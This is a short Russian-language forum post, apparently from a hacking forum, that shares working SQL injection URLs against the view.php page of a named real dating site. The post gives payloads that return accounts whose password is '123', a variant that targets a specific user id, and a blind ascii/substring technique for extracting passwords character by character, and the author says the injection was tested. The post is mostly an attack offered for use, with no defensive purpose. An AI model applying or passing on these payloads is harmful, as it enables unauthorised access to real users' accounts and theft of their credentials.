зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут